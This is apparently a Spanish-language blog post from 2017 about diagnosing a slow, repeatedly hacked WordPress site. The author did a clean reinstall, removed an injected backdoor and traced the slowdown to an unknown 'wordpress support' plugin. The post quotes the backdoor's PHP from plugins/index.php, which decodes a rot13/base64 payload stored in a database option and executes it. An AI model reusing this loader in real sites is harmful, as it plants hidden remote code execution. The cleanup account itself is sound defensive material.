@ agnasg

Mi sitio está lento: opción 1: desarrollar un clone de wp. opción 2: buscar el problema.

15-06-2017 7:37 AM

Así es. Estuve 3 días desarrollando un sistema de blogging para sustituir a wordpress porque realmente estoy cansado de remover los hacks que quien sabe de dónde vienen y cómo se instalan. Me parece que mi sitio está medianamente al día (el wordpress está actualizado a la última versión). Sin embargo estaba muy lento (6-10 segundos en responder). Al 4to día viendo que mi nuevo sistema de blogging todavía  requería trabajo (y tengo otros proyectos que atender) decidí darle a wordpress una segunda oportunidad. ¿Revisar de nuevo los archivos? No. Comencé por instalar un wordpress nuevo (recién sacado del tar.gz). Me costó bastante importar los posts porque inicié como costumbre el proceso a mano. Después descubrí que hay un export/import en Herramientas así que realmente no hay que hacer gran trabajo aquí.

El resultado no fue sorprendente, la nueva instalación respondió como debe ser, en un segundo desplegó el sitio. Así que comencé a hacer diagnóstico. Los archivos dieron varios positivos siendo el más grave este en plugins/index.php:


$z=get_option("_site_transient_browser_25cfdbde836e39c625962dca0e6fa4ab"); $z=base64_decode(str_rot13($z['update_url'])); if(strpos($z,"A5634C5C")!==false){ 
$_z=create_function("",$z); @$_z(); }
$myn="..."}

Pero al eliminarlo no se produjo ningún cambio. También eliminé los site_transient_browser de la base de datos para estar seguro (en este artículo se dice que tratar de hacer esto es como orinar en una piscina y luego tratar de remover el orine. Es el tipo de cosas que hago con bastante frecuencia, por ello lo de hacer mi clone de wp no resulta tan descabellado después de todo).

Finalmente comencé a revisar los plugins (que es por donde debí comenzar hace una semana). Resultó que la lentitud la estaba generando un plugin: wordpress support. No sé cómo se instaló pero ahí estaba de lo más inocente.
Con esto se resolvió el problema y ahora el sitio está a velocidad normal. Esta va a ser la última vez que hago esto, la próxima vez voy a migrar a mi sistema de blogging. Se cansa uno.